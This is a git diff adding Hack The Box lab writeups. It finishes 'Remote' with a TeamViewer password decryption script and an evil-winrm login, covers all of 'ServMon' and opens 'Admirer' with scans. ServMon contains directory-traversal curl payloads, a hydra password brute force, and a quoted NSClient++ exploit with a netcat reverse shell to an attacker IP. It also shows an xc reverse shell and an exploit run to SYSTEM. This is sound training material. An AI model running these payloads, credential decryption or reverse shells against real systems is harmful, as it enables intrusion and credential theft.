+ SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
+ LastMACUsed REG_MULTI_SZ \0005056B9A169
+ MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
+ MIDVersion REG_DWORD 0x1
+ ClientID REG_DWORD 0x6972e4aa
+ CUse REG_DWORD 0x1
+ LastUpdateCheck REG_DWORD 0x5e72893c
+ UsageEnvironmentBackup REG_DWORD 0x1
+ **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
+ MultiPwdMgmtIDs REG_MULTI_SZ admin
+ MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
+ Security_PasswordStrength REG_DWORD 0x3
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
+
+
+
+We already see it but let's filter to just get the part we want:
+
+
+
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ **SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
+
+
+
+now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password:
+
+
+ import sys, hexdump, binascii
+ from Crypto.Cipher import AES
+
+ class AESCipher:
+ def __init__(self, key):
+ self.key = key
+
+ def decrypt(self, iv, data):
+ self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
+ return self.cipher.decrypt(data)
+
+ key = binascii.unhexlify("0602000000a400005253413100040000")
+ iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
+ **hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"**
+
+ ciphertext = binascii.unhexlify(hex_str_cipher)
+
+ raw_un = AESCipher(key).decrypt(iv, ciphertext)
+
+ print(hexdump.hexdump(raw_un))
+
+ password = raw_un.decode('utf-16')
+ print(password)
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → pip3 install pycryptodome hexdump
+ Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
+ Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → python3 decrypt.py
+ 00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
+ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+ None
+ !R3m0te!
+
+
+And we found the password! Now let's use it with evilWinRM:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
+ → evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
+ remote\administrator
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ 6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/45.md b/Easy/45.md
new file mode 100644
index 0000000..af9dbb1
--- /dev/null
+++ b/Easy/45.md
@@ -0,0 +1,581 @@
+# ServMon Writeup
+
+
+
+## Introduction :
+
+ServMon is an easy Windows box released back in April 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → nmap -sCV 10.10.10.184
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST
+ Nmap scan report for 10.10.10.184
+ Host is up (0.053s latency).
+ Not shown: 996 closed ports
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 5666/tcp open tcpwrapped
+ 8443/tcp open ssl/https-alt
+ | fingerprint-strings:
+ | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
+ | HTTP/1.1 404
+ | Content-Length: 18
+ | Document not found
+ | GetRequest:
+ | HTTP/1.1 302
+ | Content-Length: 0
+ | Location: /index.md
+ | workers
+ |_ jobs
+ | http-title: NSClient++
+ |_Requested resource was /index.md
+ | ssl-cert: Subject: commonName=localhost
+ | Not valid before: 2020-01-14T13:24:20
+ |_Not valid after: 2021-01-13T13:24:20
+ |_ssl-date: TLS randomness does not represent time
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/29%Time=60B25FA8%P=x86_64-pc-linux-gn
+ SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
+ SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
+ SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
+ SF:8\x7f\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
+ SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
+ SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
+ SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
+ SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
+ SF::\x2018\r\n\r\nDocument\x20not\x20found");
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
+ |_smb2-time: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
+ Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → nmap -sCV -p21 10.10.10.184
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST
+ Nmap scan report for 10.10.10.184
+ Host is up (0.12s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_01-18-20 12:05PM Users
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 ftp with anonymous login allowed, so let's examine it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → wget -r ftp://anonymous:anonymous@10.10.10.184/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → tree
+ .
+ └── 10.10.10.184
+ └── Users
+ ├── Nadine
+ │ └── Confidential.txt
+ └── Nathan
+ └── Notes to do.txt
+
+
+After downloading recursively everything there was in the ftp service, we get 2 potential usernames and 2 textfiles:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat 10.10.10.184/Users/Nadine/Confidential.txt
+ Nathan,
+
+ I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
+
+ Regards
+
+ Nadine%
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
+ 1) Change the password for NVMS - Complete
+ 2) Lock down the NSClient Access - Complete
+ 3) Upload the passwords
+ 4) Remove public access to NVMS
+ 5) Place the secret files in SharePoint%
+
+
+Our nmap scan also picked up port 80:
+
+
+
+Seems like we get a NVMS service, let's check if there are any exploits known for it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → searchsploit NVMS
+ ------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------ ---------------------------------
+ NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
+ OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt
+ OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt
+ TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
+ ------------------------------------------ ---------------------------------
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → cat $(locate 47774.txt)
+ # Title: NVMS-1000 - Directory Traversal
+ # Date: 2019-12-12
+ # Author: Numan Türle
+ # Vendor Homepage: http://en.tvt.net.cn/
+ # Version : N/A
+ # Software Link : http://en.tvt.net.cn/products/188.html
+
+ POC
+ ---------
+
+ GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
+ Host: 12.0.0.1
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+ Accept-Encoding: gzip, deflate
+ Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ Response
+ ---------
+
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1%
+
+
+Looks like NVMS1000 is vulnerable to Directory Traversal attacks, so let's test this:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is
+ ; for 16-bit app support
+ [fonts]
+ [extensions]
+ [mci extensions]
+ [files]
+ [Mail]
+ MAPI=1
+
+
+
+Following the note we found earlier, let's use that directory traversal vulnerability to get to Passwords.txt:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is
+ 1nsp3ctTh3Way2Mars!
+ Th3r34r3To0M4nyTrait0r5!
+ B3WithM30r4ga1n5tMe
+ L1k3B1gBut7s@W0rk
+ 0nly7h3y0unGWi11F0l10w
+ IfH3s4b0Utg0t0H1sH0me
+ Gr4etN3w5w17hMySk1Pa5$%
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt
+
+
+
+Now with this we can use hydra to bruteforce the ssh passwords :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → hydra -L users.txt -P passwords.txt ssh://10.10.10.184
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
+ [DATA] attacking ssh://10.10.10.184:22/
+ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01
+
+
+
+So let's SSH as the nadine user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → ssh nadine@10.10.10.184
+ The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
+ ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts.
+ nadine@10.10.10.184's password:
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\Users\Nadine>dir
+ Volume in drive C has no label.
+ Volume Serial Number is DC93-6115
+
+ Directory of C:\Users\Nadine
+
+ 08/04/2020 23:16 DIR> .
+ 08/04/2020 23:16 DIR> ..
+ 18/01/2020 11:23 DIR> 3D Objects
+ 18/01/2020 11:23 DIR> Contacts
+ 08/04/2020 22:28 DIR> Desktop
+ 08/04/2020 22:28 DIR> Documents
+ 18/01/2020 11:23 DIR> Downloads
+ 08/04/2020 22:27 DIR> Favorites
+ 08/04/2020 22:27 DIR> Links
+ 18/01/2020 11:23 DIR> Music
+ 18/01/2020 11:31 DIR> OneDrive
+ 18/01/2020 11:23 DIR> Pictures
+ 18/01/2020 11:23 DIR> Saved Games
+ 18/01/2020 11:23 DIR> Searches
+ 18/01/2020 11:23 DIR> Videos
+ 0 File(s) 0 bytes
+ 15 Dir(s) 6,097,006,592 bytes free
+
+ nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt
+ The syntax of the command is incorrect.
+
+ nadine@SERVMON C:\Users\Nadine>cd Desktop
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is DC93-6115
+
+ Directory of C:\Users\Nadine\Desktop
+ ****08/04/2020 22:28 DIR> .
+ 08/04/2020 22:28 DIR> ..
+ 29/05/2021 16:31 34 user.txt
+ 1 File(s) 34 bytes
+ 2 Dir(s) 6,097,006,592 bytes free
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
+ dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get root access to this box, we're going to use WinPEAS to enumerate this box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → locate winPEAS.bat
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat" --output peas.bat
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 35761 100 35761 0 0 35761 0 0:00:01 --:--:-- 0:00:01 247k
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat
+
+
+` 
+
+As we look for interesting stuff with the winpeas.bat output, we stumble upon NSClient++:
+
+
+
+So let's look for available exploits:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → searchsploit nsclient++
+ ----------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------- ---------------------------------
+ NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt
+ NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt
+ ----------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+Here we want the Privilege Escalation one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cat $(46802.txt)
+ 46802.txt: command not found
+ ^[[A^C
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → cat $(locate 46802.txt)
+
+ [...]
+
+ Exploit:
+ 1. Grab web administrator password
+ - open c:\program files\nsclient++\nsclient.ini
+ or
+ - run the following that is instructed when you select forget password
+ C:\Program Files\NSClient++>nscp web -- password --display
+ Current password: SoSecret
+
+ 2. Login and enable following modules including enable at startup and save configuration
+ - CheckExternalScripts
+ - Scheduler
+
+ 3. Download nc.exe and evil.bat to c:\temp from attacking machine
+ @echo off
+ c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
+
+ 4. Setup listener on attacking machine
+ nc -nlvvp 443
+
+ 5. Add script foobar to call evil.bat and save settings
+ - Settings > External Scripts > Scripts
+ - Add New
+ - foobar
+ command = c:\temp\evil.bat
+
+ 6. Add schedulede to call script every 1 minute and save settings
+ - Settings > Scheduler > Schedules
+ - Add new
+ - foobar
+ interval = 1m
+ command = foobar
+
+ 7. Restart the computer and wait for the reverse shell on attacking machine
+ nc -nlvvp 443
+ listening on [any] 443 ...
+ connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
+ Microsoft Windows [Version 10.0.17134.753]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Program Files\NSClient++>whoami
+ whoami
+ nt authority\system
+
+
+We could follow the steps, but it is preferable to use the other script (48360.py) to automate this. So we're going to follow the first step:
+
+
+ nadine@SERVMON C:\Users\Nadine\Desktop>powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+ Try the new cross-platform PowerShell https://aka.ms/pscore6
+
+ PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password
+ password = ew2x6SsGTxjRwXOT
+
+
+
+And then, we're going to visit port 8443, that our nmap scan picked up as being NSClient++, however viewing the page from https://10.10.10.184:8443 will not allow us to login because only localhost is allowed as we can see from the config file:
+
+
+ PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127
+ allowed hosts = 127.0.0.1
+
+
+
+So we're going to make a SSH tunnel to the host to access it's localhost:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → **ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184**
+ nadine@10.10.10.184's password: **L1k3B1gBut7s@W0rk**
+
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\Users\Nadine>
+
+
+
+Now with the SSH tunnel, we can visit the website from it's localhost by going to **https://127.0.0.1:8443** using the **ew2x6SsGTxjRwXOT** password we found earlier:
+
+
+
+
+
+Once we are logged in, we're going to make sure that we can get a binary file to get a reverse shell from the box. And as i have discovered, HTB does not care about it's older retired boxes, and does not update them / fix them in case a problem like this happens:
+
+
+
+Literally every other writeup of this machine uses netcat (x86 or x64 versions) and yet it is not doable on this box. Therefore we need to get a binary file onto the box that will replicate what netcat does but at the same time bypassing whatever is preventing us from getting a reverse shell (privileged or not) from this box, although we could hypothesize that this box has flagged several of our netcat binaries, we can't know for sure. To do so we're going to use [xc](https://github.com/xct/xc) which is a golang version of netcat written by [xct](https://app.hackthebox.eu/profile/13569):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → sudo apt install golang-go
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → git clone https://github.com/xct/xc ; cd xc
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
+ → go version
+ go version go1.15.9 linux/amd64
+
+
+
+We first need go version 1.15+ to be able to compile the xc binary, then clone the xc repository, then we follow the setup steps on the README.md:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get golang.org/x/sys/...
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get golang.org/x/text/encoding/unicode
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get github.com/hashicorp/yamux
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → go get github.com/ropnop/go-clr
+ package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → pip3 install donut-shellcode
+ Collecting donut-shellcode
+ Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
+ |████████████████████████████████| 149 kB 2.0 MB/s
+ Building wheels for collected packages: donut-shellcode
+ Building wheel for donut-shellcode (setup.py) ... done
+ Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
+ Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
+ Successfully built donut-shellcode
+ Installing collected packages: donut-shellcode
+ Successfully installed donut-shellcode-0.9.2
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → sudo apt install rlwrap upx -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → make
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → ls -lash | grep xc
+ 1.3M -rwxr-xr-x 1 nothing nothing 1.3M May 30 14:03 xc
+ 3.2M -rwxr-xr-x 1 nothing nothing 3.2M May 30 14:03 xc.exe
+ 4.0K -rw-r--r-- 1 nothing nothing 2.7K May 30 14:03 xc.go
+
+ [ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
+ → file xc xc.exe xc.go
+ xc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
+ xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
+ xc.go: C source, ASCII text
+
+
+
+So now we successfully compiled xc for both linux and windows, let's test the linux version:
+
+
+
+Looks like it is working locally, so let's test the windows version of xc on the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
+ → python3 -m http.server 9090
+
+ PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
+
+ PS C:\Users\Nadine> cd c:\temp
+
+ PS C:\temp> ./xc.exe 10.10.14.13 9001
+ 2021/05/30 13:59:45 Connected to 10.10.14.13:9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/05/30 14:51:44 Listening on :9001
+ 2021/05/30 14:51:44 Waiting for connections...
+ 2021/05/30 14:52:08 Connection from 10.10.10.184:56967
+ 2021/05/30 14:52:08 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\temp]: !shell
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ nadine@SERVMON C:\temp>whoami
+ whoami
+ servmon\nadine
+
+And we managed to get a reverse shell ! Although it's as the nadine user, so let's get one with the privesc exploit:
+
+
+ PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
+ → python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001"
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
+ → ./xc -l -p 9001
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/05/30 15:02:41 Listening on :9001
+ 2021/05/30 15:02:41 Waiting for connections...
+ 2021/05/30 15:03:08 Connection from 10.10.10.184:57375
+ 2021/05/30 15:03:08 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\Program Files\NSClient++]: !shell
+ Microsoft Windows [Version 10.0.18363.752]
+ (c) 2019 Microsoft Corporation. All rights reserved.
+
+ C:\Program Files\NSClient++>whoami
+ whoami
+ nt authority\system
+
+ C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt
+ type C:\Users\Administrator\Desktop\root.txt
+ d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/46.md b/Easy/46.md
new file mode 100644
index 0000000..18ed29d
--- /dev/null
+++ b/Easy/46.md
@@ -0,0 +1,808 @@
+# Admirer Writeup
+
+
+
+## Introduction :
+
+Admirer is an easy/Medium linux box released back in May 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Admirer]
+ → nmap -vvv -p- 10.10.10.187 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.187
+ Discovered open port 80/tcp on 10.10.10.187
+ Discovered open port 21/tcp on 10.10.10.187
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Admirer]
+ → nmap -sCV -p22,80,21 10.10.10.187
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 12:53 CEST
+ Nmap scan report for 10.10.10.187
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
+ | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
+ |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ | http-robots.txt: 1 disallowed entry
+ |_/admin-dir
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Admirer
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+basic enumeration on this webpage doesn't give us anything, the /admin-dir directory gives us a 403 forbdiden error as our nmap scan hinted us towards. So let's try to list the other directories on this website using gobuster:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Admirer]
+ → gobuster dir -u http://10.10.10.187 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -t 50
